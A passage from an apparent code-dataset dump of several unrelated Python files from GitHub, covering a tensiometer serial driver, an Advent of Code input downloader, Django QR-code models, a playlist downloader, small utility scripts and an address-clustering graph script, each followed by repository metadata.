return(sorted(serial.tools.list_ports.comports()))\n\n\ndef print_ports_list(ports_list):\n '''\n Prints the list of detected ports\n '''\n i = 0\n print("\r\nPlease select the port where tensiometer is connected to.")\n for device, desc, hwid in ports_list:\n print("\t{} ) {} - {} [{}]".format(i, device, desc, hwid))\n i = i + 1\n print("\t---")\n print("\t{} ) {}".format("r", "Rescan ports"))\n\n\ndef calculate_temperature_compensated_reference_pressure(temperature:float, p_0:float, c_t1:float, c_t2:float):\n '''\n Calculates temperature compensated reference pressure\n '''\n return c_t1 * temperature**2 + c_t2 * temperature + p_0\n\n\ndef calculate_tension(pressure, p_compensated_ref):\n '''\n Calculate tension from temperature compensated reference and measured pressure\n '''\n return p_compensated_ref - pressure\n\nclass UGTTensiometer():\n '''\n Class object for tensiometer.\n '''\n\n # Class variables\n _ser = None # Reference to serial device tensiometer is attached to\n _serial_number = None # Serial number of tensiometer\n _temperature_bus_addr = None # Bus address for temperature\n _pressure_bus_addr = None # Bus address for pressure\n _c_t1:float # Temperature coefficient 1, C_t1, [kPa/C^2]\n _c_t2:float # Temperature coefficient 2, C_t2 [kPa/C]\n _p_0:float # Reference pressure at 0 degrees celsius [kPa]\n\n # FRT calibration values\n _calibration = None\n\n def __init__(self, ser:serial.Serial, serial_number:str, t1_coeff:float, t2_coeff:float, p0_ref:float, \\\n bus_temp:str=None, bus_pressure:str=None):\n if ser is not None:\n self.attach(ser)\n self._serial_number = serial_number\n self._c_t1 = t1_coeff\n self._c_t2 = t2_coeff\n self._p_0 = p0_ref\n self._temperature_bus_addr = bus_temp\n self._pressure_bus_addr = bus_pressure\n\n @staticmethod\n def configure_serial(ser:serial.Serial):\n '''\n Wrapper for configuration of serial object\n Parameters for the serial interface (UART) are 9600 8N1\n (9600 baud, 8 data bits, no parity, 1 stop bit)\n '''\n ser.baudrate = 9600\n ser.bytesize = serial.EIGHTBITS\n ser.parity = serial.PARITY_NONE\n ser.stopbits = serial.STOPBITS_ONE\n ser.timeout = 5\n if ser.isOpen() is False:\n ser.open()\n\n @staticmethod\n def send_command(ser:serial.Serial, message):\n '''\n Serial write wrapper to package command and flush before sending command.\n '''\n ser.write(F"{message}\r".encode())\n ser.flush()\n\n @staticmethod\n def get_reply(ser:serial.Serial):\n '''\n Wrapper for serial read_until(), returns a string without "\\r"\n '''\n return ser.read_until(b"\r").decode().rstrip()\n\n @staticmethod\n def ack_ok(ser:serial.Serial):\n '''\n Check if sensor returned OK, returns True or False\n '''\n ok_ack = UGTTensiometer.get_reply(ser)\n return ok_ack == "OK"\n\n @staticmethod\n def request_serial(ser:serial.Serial):\n '''\n Send get serial number command, need to open bus OPx first.\n '''\n UGTTensiometer.send_command(ser, "GSN")\n\n @staticmethod\n def request_bus_address(ser:serial.Serial, channel):\n '''\n Send get bus address command, need to open bus using OPx first.\n '''\n if channel < 1 or channel > 4:\n raise ValueError("Incorrect channel value")\n UGTTensiometer.send_command(ser, F"GAD{channel}")\n\n @staticmethod\n def open_bus(ser:serial.Serial, bus_address):\n '''\n Send open bus command, returns True or False\n '''\n UGTTensiometer.send_command(ser, F"OP{bus_address}")\n return UGTTensiometer.ack_ok(ser)\n\n @staticmethod\n def get_raw(ser:serial.Serial):\n '''\n Send request measurement command, need 
to open bus first using OPx\n '''\n UGTTensiometer.send_command(ser, "GN")\n return UGTTensiometer.get_reply(ser)\n\n @staticmethod\n def change_channel_bus(ser:serial.Serial, channel, new_bus_address):\n '''\n Change bus address, returns True if successful.\n Need to open correct bus to FRT with OPx first.\n '''\n UGTTensiometer.send_command(ser, F"SAD{channel} {new_bus_address}")\n return UGTTensiometer.ack_ok(ser)\n\n @staticmethod\n def raw_to_celsius(digital_value: float):\n '''\n Convert measured temperature digital output to celsius\n '''\n if isinstance(digital_value, str):\n digital_value = float(digital_value)\n # return (digital_value - BIT_CONVERSION_FACTOR) / 320\n return (digital_value - UGT_CONVERSION_FACTOR_32768) / 100\n\n @staticmethod\n def raw_to_kpa(digital_value: float):\n '''\n Convert measured pressure digital output to kPa\n '''\n if isinstance(digital_value, str):\n digital_value = float(digital_value)\n return (((digital_value - BIT_CONVERSION_FACTOR) * UGT_CONVERSION_FACTOR_31 / UGT_CONVERSION_FACTOR_32768) - 1) * 100\n\n def attach(self, ser:serial.Serial):\n '''\n Reference a serial port for the tensiometer to communicate on.\n '''\n if not isinstance(ser, serial.Serial):\n raise TypeError("Tensiometer needs to be attached to a valid serial object")\n self._ser = ser\n if self._ser.isOpen() is False:\n self._ser.open()\n\n @property\n def serial_number(self):\n '''\n Returns string representation of the serial number\n '''\n return self._serial_number\n\n @serial_number.setter\n def serial_number(self, serial_number):\n '''\n Change serial number\n '''\n if serial_number is not None and isinstance(serial_number, str):\n serial_number = serial_number.strip()\n self._serial_number = serial_number\n\n @property\n def temperature_bus_addr(self):\n '''\n Returns string representation of temperature bus address\n '''\n return str(self._temperature_bus_addr)\n\n @temperature_bus_addr.setter\n def temperature_bus_addr(self, address):\n '''\n Change temperature bus address\n '''\n if address is not None and isinstance(address, str):\n address = address.strip()\n self._temperature_bus_addr = address\n\n @property\n def pressure_bus_addr(self):\n '''\n Returns string representation of pressure bus address\n '''\n return str(self._pressure_bus_addr)\n\n @pressure_bus_addr.setter\n def pressure_bus_addr(self, address):\n '''\n Change pressure bus address\n '''\n if address is not None and isinstance(address, str):\n address = address.strip()\n self._pressure_bus_addr = address\n\n def update_temperature_bus_address(self):\n '''\n Gets and updates the temperature bus address.\n '''\n if self._serial_number is None:\n raise RuntimeError("Device does not have a serial number")\n if UGTTensiometer.open_bus(self._ser, self._serial_number):\n UGTTensiometer.request_bus_address(self._ser, CHANNEL_TEMPERATURE)\n address = UGTTensiometer.get_reply(self._ser)\n if address == "":\n return False\n self._temperature_bus_addr = address\n return True\n\n def update_pressure_bus_address(self):\n '''\n Gets and updates the pressure bus address.\n '''\n if self._serial_number is None:\n raise RuntimeError("Device does not have a serial number")\n if UGTTensiometer.open_bus(self._ser, self._serial_number):\n UGTTensiometer.request_bus_address(self._ser, CHANNEL_PRESSURE)\n address = UGTTensiometer.get_reply(self._ser)\n if address == "":\n return False\n self._pressure_bus_addr = address\n return True\n\n def get_temperature_raw(self):\n '''\n Get digital raw temperature reading from 
sensor\n '''\n\n if self._temperature_bus_addr is None:\n raise RuntimeError(\"Temperature bus address not set\")\n\n if UGTTensiometer.open_bus(self._ser, self._temperature_bus_addr) is False:\n raise RuntimeError(\"Unable to communicate with sensor\")\n\n return UGTTensiometer.get_raw(self._ser)\n\n def get_pressure_raw(self):\n '''\n Get digital raw pressure reading from sensor\n '''\n\n if self._pressure_bus_addr is None:\n raise RuntimeError(\"Pressure bus address not set\")\n\n if UGTTensiometer.open_bus(self._ser, self._pressure_bus_addr) is False:\n raise RuntimeError(\"Unable to communicate with sensor\")\n\n return UGTTensiometer.get_raw(self._ser)\n\n def get_temperature(self):\n '''\n Get temperature reading from tensiometer in celsius.\n '''\n value = UGTTensiometer.get_temperature_raw(self)\n return UGTTensiometer.raw_to_celsius(value)\n\n def get_pressure(self):\n '''\n Get pressure reading from tensiometer in kPa.\n '''\n value = UGTTensiometer.get_pressure_raw(self)\n return UGTTensiometer.raw_to_kpa(value)\n\n def get_suction(self, temperature:float, pressure:float):\n '''\n Return the tension as calculated from tensiometer calibrated info.\n '''\n p_ref = calculate_temperature_compensated_reference_pressure(temperature=temperature,\n p_0=self._p_0, c_t1=self._c_t1, c_t2=self._c_t2)\n return p_ref - pressure\n\n\ndef serial_session(serial_obj: serial):\n '''\n Serial session to interface with sensor\n '''\n while True:\n user_input = input(\"Command to send: \").strip().upper()\n if user_input in (\"X\", \"EXIT\"):\n break\n UGTTensiometer.send_command(serial_obj, user_input)\n time.sleep(0.1)\n while serial_obj.in_waiting:\n message = UGTTensiometer.get_reply(serial_obj)\n print(message)\n\n\ndef sample_single(tensiometer:UGTTensiometer, csv_file:TextIOWrapper=None):\n '''\n Main function single sampling of UGT tensiometer\n '''\n time_now_local_str = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n temperature_raw = tensiometer.get_temperature_raw() # temp in digital value\n temperature = UGTTensiometer.raw_to_celsius(temperature_raw) # temp in celsius\n pressure_raw = tensiometer.get_pressure_raw() # pressure in digital value\n pressure = UGTTensiometer.raw_to_kpa(pressure_raw) # pressure in kPa\n suction = tensiometer.get_suction(temperature, pressure)\n\n print(F\"Temperature: {temperature_raw} (Digital), {temperature} (C)\")\n print(F\"Pressure: {pressure_raw} (Digital), {pressure} (kPa)\")\n print(F\"Suction: {suction} (kPa)\")\n\n if SAVE_TO_CSV and csv_file is not None:\n csv_file.write(F\"{time_now_local_str},{temperature_raw},{pressure_raw},{temperature},{pressure},{suction}\\n\")\n # csv_file.flush()\n\n\ndef sample_loop(tensiometer:UGTTensiometer, csv_file:TextIOWrapper=None):\n '''\n Prompts user for sampling interval in seconds to sample at specified intervals.\n '''\n interval = int(input(\"Time interval between sampling in seconds: \"))\n print(F\"Sampling interval set at {interval} seconds\")\n while True:\n sample_single(tensiometer, csv_file)\n print(F\"{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())} - Waiting {interval} seconds\")\n time.sleep(interval)\n\n\nif __name__ == '__main__':\n ports = get_com_ports_list()\n print_ports_list(ports)\n\n user_port_selection = -1\n while(user_port_selection < 0 or user_port_selection >= len(ports)):\n user_port_selection = input(\"Enter a number: \").strip()\n\n if user_port_selection == \"r\":\n ports = get_com_ports_list()\n print_ports_list(ports)\n user_port_selection = -1\n elif 
user_port_selection == \"x\":\n exit()\n else:\n user_port_selection = int(user_port_selection)\n\n port_address = ports[user_port_selection].device\n\n tensiometer_comm = serial.Serial(port_address)\n UGTTensiometer.configure_serial(tensiometer_comm)\n\n try:\n # Create tensiometer object and update bus addresses for the sensor\n tensiometer = UGTTensiometer(ser=tensiometer_comm, serial_number=\"202000024\", \\\n t1_coeff=-0.1718, t2_coeff=28.7730, p0_ref=1925.25)\n # tensiometer = UGTTensiometer(ser=tensiometer_comm, serial_number=\"20180005\", \\\n # t1_coeff=-0.1173, t2_coeff=24.595, p0_ref=1462.1)\n tensiometer.update_temperature_bus_address()\n tensiometer.update_pressure_bus_address()\n\n # serial_session(tensiometer_comm)\n if SAVE_TO_CSV:\n csv_file = open_csv(CSV_FILE_PATH)\n else:\n csv_file = None\n\n # sample_single(tensiometer, csv_file)\n sample_loop(tensiometer, csv_file)\n\n except KeyboardInterrupt:\n print(\"\")\n except Exception:\n traceback.print_exc()\n # print(sys.exc_info()[0])\n finally:\n # Cleaning up\n if tensiometer_comm is not None and tensiometer_comm.isOpen():\n tensiometer_comm.close()\n try:\n if SAVE_TO_CSV:\n # csv_file.write(\"\\r\\n\")\n if not csv_file.closed:\n csv_file.close()\n except (NameError):\n pass\n","repo_name":"ltan10/UGTTensiometer","sub_path":"tensiometer.py","file_name":"tensiometer.py","file_ext":"py","file_size_in_byte":14802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33361960259","text":"import pathlib\nimport urllib.request\n\nfrom . import utils\n\n\ndef get_input(root_path: pathlib.Path, year: int, day: int, session: str) -> int:\n # Download data from server\n url: str = f\"https://adventofcode.com/{year}/day/{day}/input\"\n request = urllib.request.Request(\n url,\n headers={\n \"Cookie\": f\"session={session}\"\n })\n response = urllib.request.urlopen(request)\n if response.status != 200:\n utils.print_error_msg(\n 'Error while trying to connect to the \\\"Advent of Code\\\" webpage. Check the input parameters of the script and make sure that the session key is valid.')\n return 1\n # Check if the selected puzzle folder structure exists\n input_path = root_path / f\"puzzles/{year}/{day}/sources/input.txt\"\n if not input_path.is_file():\n utils.print_error_msg(\n 'Missing folder structure for the selected puzzle. 
Use \"add_day\" subcommand first.')\n return 1\n # Save into file\n with open(input_path, \"wb\") as f:\n f.write(response.read().strip())\n\n print(\n f'Input data for puzzle {year} day {day} has been stored in {input_path.absolute()}.')\n return 0\n","repo_name":"Hekkfern/advent-of-code","sub_path":"scripts/internal/getinput_subcommand.py","file_name":"getinput_subcommand.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"25872612804","text":"import qrcode\nfrom io import BytesIO\n\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.contrib.sites.models import Site\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.dispatch import receiver\n\nfrom user.models import User\nfrom voucher.models import Voucher\n\n\nclass QRCode(models.Model):\n \"\"\"\n Default QR code class\n \"\"\"\n\n qr_code = models.ImageField(\n _(\"QR code\"), upload_to=\"qr_codes\", blank=True, null=True\n )\n\n class Meta:\n abstract = True\n\n def create_code(self, data, filename=None):\n \"\"\"\n Create the QR Code\n data - data that needs to be encoded in the qr image\n \"\"\"\n qr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=2,\n )\n qr.add_data(data)\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\n\n buffer = BytesIO()\n img.save(buffer)\n filename = f\"{filename or str(self.pk)}.png\"\n file_buffer = InMemoryUploadedFile(\n buffer, None, filename, \"image/png\", len(buffer.getvalue()), None\n )\n self.qr_code.save(filename, file_buffer)\n\n\nclass UserQRCode(QRCode):\n \"\"\"\n User QR code\n \"\"\"\n\n user = models.OneToOneField(\n User,\n verbose_name=_(\"User\"),\n related_name=\"qr_code\",\n on_delete=models.CASCADE,\n )\n\n def __str__(self):\n return f\"{self.user} QR code [{self.pk}]\"\n\n class Meta:\n verbose_name = _(\"User QR code\")\n verbose_name_plural = _(\"User QR codes\")\n\n\nclass VoucherQRCode(QRCode):\n voucher = models.OneToOneField(\n Voucher,\n verbose_name=_(\"Voucher\"),\n related_name=\"qr_code\",\n on_delete=models.CASCADE,\n )\n qr_code = models.ImageField(\n _(\"QR Code\"), upload_to=\"vouchers/qr_codes\", blank=True, null=True\n )\n\n def __str__(self):\n return f\"{self.voucher} QR code [{self.pk}]\"\n\n class Meta:\n verbose_name = _(\"Voucher QR code\")\n verbose_name_plural = _(\"Voucher QR codes\")\n\n\nclass SitesTracker(models.Model):\n original_domain = models.CharField(\n max_length=100,\n unique=True\n )\n site = models.ForeignKey(\n Site,\n on_delete=models.CASCADE\n )\n\n\n@receiver(post_save, sender=Site)\ndef recreate_qr_codes(sender, instance, created, **kwargs):\n if created or not SitesTracker.objects.filter(site=instance).exists():\n SitesTracker.objects.create(original_domain=instance.domain, site=instance)\n\n tracker = SitesTracker.objects.filter(site=instance).first()\n\n if tracker and tracker.original_domain != instance.domain:\n tracker.original_domain = instance.domain\n tracker.save()\n for user in User.objects.all():\n user.qr_code.qr_code.delete()\n user.qr_code.delete()\n user.create_qr_code()\n\n for voucher in Voucher.objects.all():\n voucher.qr_code.qr_code.delete()\n voucher.qr_code.delete()\n 
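        # The two delete() calls above drop the stored PNG and the QRCode row;
        # the create_qr_code() call that follows (assumed to be defined on the
        # Voucher model, mirroring the User.create_qr_code used earlier in this
        # handler) regenerates the image so the encoded payload picks up the
        # new Site domain.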
voucher.create_qr_code()","repo_name":"Tynianov/coffee_shop","sub_path":"qr_code/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20759630459","text":"import pygame\n\n\n'''this class is used to handle the file \"keys.txt\" which contains the current keyboard keys that the player chooses\nin setting class. the keys are read in game initialization so the player can choose to change keys as he see fits.\nit is used by gameManage class and settings class.'''\nclass FileHandler:\n def __init__(self):\n self.__default_keys = [1073741906, 1073741903, 1073741904, 32, 97, 115]\n self.__wordList = [\"Advance\", \"Turn Right\", \"Turn Left\", \"Shoot Fireball\", \"Shoot Flamethrower\",\n \"Shoot Rocket\"]\n\n def get_words_list(self):\n return self.__wordList\n\n '''this function writes to keys.txt the saved keys for each action. thus the playing keys are updates'''\n def writeToFile(self, wordsList, currentKeys):\n with open(\"keys.txt\", \"w\") as file:\n file.write(\"**** DO NOT CHANGE THIS FILE!!!!!!****\\n\")\n file.write(\"keys:\\n\")\n\n for i in range(len(wordsList)):\n line = f\"{wordsList[i]} = {currentKeys[i]}\\n\"\n file.write(line)\n\n '''this function reads from the file the current keys, used on initialization, for now it remains public as\n it should be used on game initialization to get the playing keys. it might move to \"main\" class\n (or future name - logicSupport)'''\n\n def readFromFile(self):\n settings = []\n\n try:\n with open(\"keys.txt\", 'r') as file:\n lines = file.readlines()\n\n # Skip the first line (header)\n for line in lines[2:]:\n line = line.strip() # Remove leading/trailing whitespaces\n if line:\n key, value = line.split(' = ')\n settings.append(int(value))\n except FileNotFoundError:\n self.writeToFile(self.__wordList, self.__default_keys)\n return self.__default_keys\n\n\n return settings","repo_name":"amit9676/Ladybug","sub_path":"fileHandlerClass.py","file_name":"fileHandlerClass.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12370975747","text":"\nimport os\nimport mjdb\nimport config\nimport pandas as pd\nimport common as cmn\nfrom sqlalchemy import create_engine\n\nDIRECTORY = \"C:\\PETL\\Benefitpoint\"\nENGINE = create_engine(config.config('config.ini','postgres_alchemy')['url'])\n\ncfgs = [\n {\n 'file':'bp_splits.csv',\n 'target':'splits',\n 'targetSchema':'benefitpoint',\n 'targetCols':'office,department,account,account_id,acct_primary_sales_lead,acct_primary_service_lead,billing_carrier,plan_type,plan_name,plan_office,plan_department,plan_id,policy_group_nbr,plan_eff_date,plan_renewal_date,split_eff_date,payee_name,commission_pct,commission_split_type,override_pct,override_split_type,bonus_pct,bonus_split_type,bob_pct'\n }\n]\n\ndef main():\n for cfg in cfgs:\n if os.path.exists(os.path.join(DIRECTORY,cfg['file'])):\n df = cmn.csv_dataframe(os.path.join(DIRECTORY,cfg['file']), None, targetCols=cfg['targetCols'].split(','))\n df.to_sql(cfg['target'], ENGINE, cfg['targetSchema'], 'replace', False)\n cmn.move_file(DIRECTORY, cfg['file'], 'archive')\n\nif __name__ == '__main__':\n 
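    # main() below drives the import: for each cfg entry whose CSV exists, the
    # file is read into a DataFrame limited to targetCols, written over the
    # benefitpoint.splits table with to_sql(..., 'replace', ...), and then
    # archived via cmn.move_file (a helper from this repo's common module,
    # not shown here).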
main()","repo_name":"jbeckom/python-mjdw","sub_path":"splitsImport.py","file_name":"splitsImport.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"41453816416","text":"from pytube import YouTube\r\nfrom pytube import Playlist\r\n\r\ndownloadFolder = input(\"enter the path for download: \")\r\nurl = input(\"enter youtube url: \")\r\n\r\nplaylist = Playlist(url)\r\n\r\nfor video in playlist:\r\n print(video)\r\n yt = YouTube(video)\r\n video_select = yt.streams.get_by_itag(22)\r\n video_select.download(downloadFolder, yt.title + '.mp4')","repo_name":"LSH137/youtube_downloder","sub_path":"youtube_downloader.py","file_name":"youtube_downloader.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"1383818612","text":"import datetime\nfrom datetime import date,time,timedelta\nimport csv\nimport random\nimport webbrowser\ndata = {}\nsport = ['football','basketball']\nfood = ['tea','burger','fries']\ntyp = []\nran = []\nwith open(\"bigdata.csv\") as q:\n dataing = csv.DictReader(q, delimiter=',')\n for row in dataing:\n # ran.append(row['data'])\n ran.append(row['tag'])\n r = random.choice(ran)\n while r == 'unknown':\n r = random.choice(ran)\n print('Try searching for ' + r)\na = input('How do you feel ? ')\n\n\nif a in sport:\n typ.append('sport')\nelif a in food:\n typ.append('food')\nelse:\n typ.append('unknown')\n\n\nwith open('bigdata.csv','a+') as e:\n write = csv.writer(e, delimiter=',')\n write.writerow([a,datetime.datetime.now().time(),typ[0]])\n typ = []\n\nwebbrowser.open('https://www.google.com/#q=' + str(a))","repo_name":"dafaqSTEVEN/Kivy","sub_path":"bigdata.py","file_name":"bigdata.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"22870572895","text":"#=======*Stack*======Using LifoQueue class from queue module========\n\nimport queue\nstack=queue.LifoQueue(maxsize=1)\n#=======Push Operation==================\ndef push():\n\tif not stack.full():\n\t\telement=int(input(\"Enter Element to push\"))\n\t\tstack.put_nowait(element)\n\t\tprint(element,\" added into stack\")\n\telse:\n\t\tprint(\"Stack size=\",stack.qsize())\n\t\tprint(\"Stack is Full Can't Push\")\n\n#=======Pop Operation==================\ndef pop_element():\n\tif stack.empty():\n\t\tprint(\"Stack is Empty,can't remove\")\n\telse:\n\t\te=stack.get_nowait()\n\t\tprint(e,\"removed from stack\")\n\n#=======Top of Stack==================\ndef top_element():\n\tif stack.empty():\n\t\tprint(\"Stack is Empty\")\n\telse:\n\t\tprint(\"Top of Stack=\",stack.queue[-1])\n\n#=======show stack Operation==================\ndef display():\n\tprint(stack.queue)\n\t\nwhile True:\n\tprint(\"Select Operation: \\n1.add \\n2.remove \\n3.top of stack \\n4.show \\n5.Quit :-\")\n\tch=int(input())\n\tif(ch==1):\n\t\tpush()\n\telif(ch==2):\n\t\tpop_element()\n\telif(ch==3):\n\t\ttop_element()\n\telif(ch==4):\n\t\tdisplay()\n\telse:\n\t\tbreak\n","repo_name":"ChouguleAnkita/Python-Data-Structure","sub_path":"Stack/stack_using_queueModule.py","file_name":"stack_using_queueModule.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"20507970201","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 18 19:52:24 2022\n\n@author: 
onais\n\"\"\"\nimport sys\nsys.path.insert(0, '../dwm-refactor-v1/')\nimport DWM00_Driver as DWM\nimport pandas as pd\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom pyvis.network import Network\n\nimport re\nfrom tqdm import tqdm\nimport pandas as pd\nimport json \nimport numpy as np\n#DWM.DWM_Cluster(\"S2-parms.txt\")\n\n#Parsing 1st program\nAddress_4CAF50=open(\"SOG Clean Occupancy Data.txt\",\"r\")\nLines = Address_4CAF50.readlines()\nDF=[]\nii=0\ncount = 0\nFinalList=[]\nfileHandle = open('USAddressWordTable.txt', 'r')\nNamefileHandle = open('NamesWordTableOpt.txt', 'r')\nSplitWordTable = open('SplitWordTable.txt', 'r')\n\n# Strips the newline character\nCount=len(Lines)\nDF=pd.DataFrame()\nC=1\nCC=1\nJsonData={}\nAllAddress_Key_Value_As_MASK_Comp={}\nObservation=0\nTotal=0\ndataFinal={}\nNameListFinal=[]\nAddressListFinal=[]\nfor line in tqdm(Lines):\n line=line.strip(\"\\n\").split(\"|\")\n ID=line[0]\n line=line[1] .strip() \n Old_Address=line.strip()\n USAD_Conversion_Dict={\"1\":\"USAD_SNO\",\"2\":\"USAD_SPR\",\"3\":\"USAD_SNM\",\"4\":\"USAD_SFX\",\"5\":\"USAD_SPT\",\"6\":\"USAD_ANM\",\"7\":\"USAD_ANO\",\"8\":\"USAD_CTY\",\"9\":\"USAD_STA\",\"10\":\"USAD_ZIP\",\"11\":\"USAD_ZP4\",\"12\":\"USAD_BNM\",\"13\":\"USAD_BNO\",\"14\":\"USAD_RNM\"}\n \n USAD_Conversion_Dict_Detail={\"1\":\"USAD_SNO Street Number\",\"2\":\"USAD_SPR Street Pre-directional\",\"3\":\"USAD_SNM Street Name\",\"4\":\"USAD_SFX Street Suffix\",\"5\":\"USAD_SPT Street Post-directional\",\"6\":\"USAD_ANM Secondary Address Name\",\"7\":\"USAD_ANO Secondary Address Number\",\"8\":\"USAD_CTY City Name\",\"9\":\"USAD_STA State Name\",\"10\":\"USAD_ZIP Zip Code\",\"11\":\"USAD_ZP4 Zip 4 Code\",\"12\":\"USAD_BNM Box Name\",\"13\":\"USAD_BNO Box Number\",\"14\":\"USAD_RNM Route Name\"}\n\n \n List=USAD_Conversion_Dict.keys()\n FirstPhaseList=[]\n Address=re.sub(',',' ',line)\n Address=re.sub(' +', ' ',Address)\n Address=re.sub('[.]','',Address)\n #Address=re.sub('#','',Address) \n Address=Address.upper()\n AddressList = re.split(\"\\s|\\s,\\s \", Address)\n tmp1=0\n NameList=[]\n RevisedAddressList=[]\n SplitMask=\"\"\n for A in AddressList:\n FirstPhaseDict={}\n NResult=False\n try:\n Compare=A[0].isdigit()\n except:\n a=0\n if A==\",\":\n SplitMask+=\",\"\n elif Compare:\n SplitMask+=\"A\"\n else:\n NR=True\n for line in SplitWordTable:\n \n fields=line.split('|')\n if A==(fields[0]):\n SplitMask+=fields[1].strip()\n NR=False\n break\n if NR:\n SplitMask+=\"W\"\n SplitWordTable.seek(0)\n Name=\"\"\n indexSplit=0\n for m in range(len(SplitMask)):\n if SplitMask[m] in (\"W\",\"P\",\",\") :\n continue\n else:\n indexSplit=m\n break\n\n RevisedAddressList = AddressList[indexSplit:len(AddressList)]\n \n NameList = AddressList[0:indexSplit]\n \n if NameList[len(NameList)-1]==\",\":\n NameList.pop(len(NameList)-1)\n \n NameListFinal.append([ID,' '.join(NameList)])\n AddressListFinal.append([ID,' '.join(RevisedAddressList)])\nfile_n = open(\"FileN.txt\", \"w\")\n\nfor element in NameListFinal:\n file_n.write(element[0]+\"|\"+element[1])\n file_n.write(\"\\n\")\nfile_n.close()\n\nfile_a = open(\"FileA.txt\", \"w\")\n\nfor element in AddressListFinal:\n file_a.write(element[0]+\"|\"+element[1])\n file_a.write(\"\\n\")\nfile_a.close()\nDWM.DWM_Cluster(\"File_A_Parms.txt\")\n\nfile_Address=open(\"FileA-LinkIndex.txt\",\"r\")\nAddress_Cluster = file_Address.readlines()\nfile_a_r = open(\"SOG Clean Occupancy Data.txt\", \"r\")\n\nfile_a_r=file_a_r.readlines()\n\nfile_n_r = open(\"FileN.txt\", 
\"r\")\nLinesRead=file_n_r.readlines()\nClusters_With_ID=[]\nClusters=set()\nfor i in Address_Cluster:\n find_Address=i.split(\",\")\n Clusters_With_ID.append([find_Address[0].strip(),find_Address[1].strip()])\n if find_Address[1].strip()!=\"ClusterID\":\n Clusters.add(find_Address[1].strip())\ndel Clusters_With_ID [0]\nClusters_Dict={}\ni=1\nClusters=list(Clusters)\nClusters.sort(reverse=False)\nfor j in Clusters:\n Clusters_Dict[j]=\"C\"+str(i)\n i+=1\nt=1\nprint(Clusters_Dict)\nfile_a_w = open(\"SOG Clean Occupancy Data.txt\", \"w\")\ni=0\nfor k in Clusters_With_ID:\n Clusters_With_ID[i][1]=Clusters_Dict[Clusters_With_ID[i][1]]\n i+=1\nfor k in file_a_r:\n splitData=k.split(\"|\")\n n=0\n for l in Clusters_With_ID:\n if splitData[0]==Clusters_With_ID[n][0]:\n file_a_w.write(k.strip()+\"|\"+Clusters_With_ID[n][1])\n file_a_w.write(\"\\n\")\n break\n n+=1\nfile_n_r.close() \nfile_a_w.close() \nfile_n_w = open(\"FileNM.txt\", \"w\")\nfor k in LinesRead:\n splitData=k.split(\"|\")\n n=0\n for l in Clusters_With_ID:\n if splitData[0]==Clusters_With_ID[n][0]:\n file_n_w.write(k.strip()+\"|\"+Clusters_With_ID[n][1])\n file_n_w.write(\"\\n\")\n break\n n+=1\nfile_n_w.close()\n\n\nfile_n_r = open(\"FileNM.txt\", \"r\")\nLinesRead=file_n_r.readlines()\nfile_n_r.close()\nfile_n_w = open(\"FileNM.txt\", \"w\")\nfor k in LinesRead:\n splitData=k.split(\"|\")\n splitName=splitData[1].split(\" \")\n for o in splitName:\n file_n_w.write(o+\"|\"+splitData[2])\nfile_n_w.close()\n\nwith open('FileNM.txt') as fl:\n content = fl.read().split('\\n')\ncontent = set([line for line in content if line != ''])\ncontent = '\\n'.join(content)\nwith open('FileNM.txt', 'w') as fl:\n fl.writelines(content)\n\ncombining_centers=open(\"FileNM.txt\",\"r\")\nLinesRead=combining_centers.readlines()\nFinal_Cluster=[]\nfile_n_w = open(\"FileNM.txt\", \"w\")\nfor j in LinesRead:\n SplitW=j.split(\"|\")\n for p in LinesRead[1:len(LinesRead)-1]:\n SplitC=p.split(\"|\")\n if SplitW[0]==SplitC[0] and SplitW[1]!=SplitC[1]:\n Final_Cluster.append((SplitW[1].strip(),SplitC[1].strip()))\n \nout=list(set(map(tuple,map(sorted,Final_Cluster))))\nCluster_to_Cluster=[]\nwith open(\"FileNM.txt\",\"w\") as O:\n for k in out:\n O.writelines(k[0]+\",\"+k[1])\n O.writelines(\"\\n\")\n Cluster_to_Cluster.append([k[0],k[1]])\n \ng=Network(height='100%', width='100%',directed=True)\n \n\n\ng.show('example.html')\nopen_Cluster=open(\"FileNM.txt\",\"r\")\nlistcluster=open_Cluster.readlines()\nListFrom=[]\nListTo=[]\nedge_color=[]\n\nNodesCluster=set()\nfor m in listcluster:\n SplitX=m.split(\",\")\n NodesCluster.add(SplitX[0].strip())\n NodesCluster.add(SplitX[1].strip())\n \nfor i in NodesCluster:\n g.add_node(i,color='blue',title=i,label=i)\nNodesCluster.clear()\n\nfor m in listcluster:\n SplitX=m.split(\",\")\n ListFrom.append(SplitX[0].strip())\n ListTo.append(SplitX[1].strip())\n edge_color.append(10)\n g.add_edge(SplitX[0].strip(),SplitX[1].strip(),color='black',width=2,arrowStrikethrough=True)\n NodesCluster.add(SplitX[0].strip())\n NodesCluster.add(SplitX[1].strip())\n\n\nopen_Cluster.close()\nrangeo=set(ListFrom+ListTo)\nMap_File=open(\"SOG Clean Occupancy 